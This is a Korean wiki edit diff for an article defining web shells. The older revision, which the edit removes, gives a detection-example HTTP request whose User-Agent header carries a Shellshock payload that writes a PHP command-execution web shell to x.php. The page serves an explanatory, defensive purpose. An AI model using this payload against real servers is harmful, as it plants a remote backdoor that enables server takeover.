경고: 로그인하지 않았습니다. 편집을 하면 IP 주소가 공개되게 됩니다. 로그인하거나 계정을 생성하면 편집자가 사용자 이름으로 기록되고, 다른 장점도 있습니다.
편집을 취소할 수 있습니다.
이 편집을 되돌리려면 아래의 바뀐 내용을 확인한 후 게시해주세요.
최신판 |
당신의 편집 |
1번째 줄: |
1번째 줄: |
| [[분류:보안]][[분류:보안 공격]]
| | Web Shell; 웹페이지에서 서버에 명령어를 실행하기 위해 만들어진 프로그램 |
| ;Web Shell
| |
| ; 해커가 원격에서 웹서버를 조종할 수 있도록 제작한 웹서버용 악성코드 | |
|
| |
|
| * 서버사이드 언어인 ASP. JSP, PHP, CGI 파일 등으로 작성된다. | | * 서버사이드 언어인 ASP. JSP, PHP, CGI 파일 등으로 작성된다. |
| * 웹서버가 가지고 있는 취약점을 악용해 웹쉘을 업로드시켜 웹서버를 해킹하는데 이용하거나, 해킹한 웹서버를 관리하기 위한 목적으로 설치하기도 함 | | * 웹 사이트의 다양한 취약점을 이용해 웹 서버에 업로드한 후 실행시키기 위한 용도로 사용한다. |
| | |
| == 탐지 패킷 예제 ==
| |
| <pre>
| |
| GET /cgi-bin/bash_vul.cgi HTTP/1.1
| |
| Accept: text/html, application/xhtml+xml, */*
| |
| Accept-Language: ko-KR
| |
| User-Agent: ( ){ :; }; echo "<?\$cmd=\$_REQUEST[\"cmd\"]; if(\$cmd !=\"\"){print shell_exec(\$cmd);}?>" >../html/x.php
| |
| Accept-Encoding: gzip, deflate
| |
| </pre>
| |